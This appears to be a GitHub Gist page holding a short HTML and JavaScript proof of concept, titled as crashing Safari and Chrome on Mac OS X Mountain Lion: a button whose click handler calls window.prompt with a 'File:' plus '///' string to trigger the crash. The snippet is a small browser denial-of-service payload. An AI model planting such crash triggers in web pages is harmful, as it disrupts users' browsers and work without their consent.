Last active
December 12, 2015 02:19
-
-
Save tenkoma/4698079 to your computer and use it in GitHub Desktop.
Crash Mac Application(Mountain Lion) Safari, Chrome
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<button id="macCrash">App Crash on Mountain Lion!?</button> | |
<script type="text/javascript">// <![CDATA[ | |
window.addEventListener("load", function(){ | |
var button = document.getElementById("macCrash"); | |
button.addEventListener("click", function(){ | |
window.prompt("Crash!", "File:"+"///"); | |
}); | |
}); | |
// ]]></script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment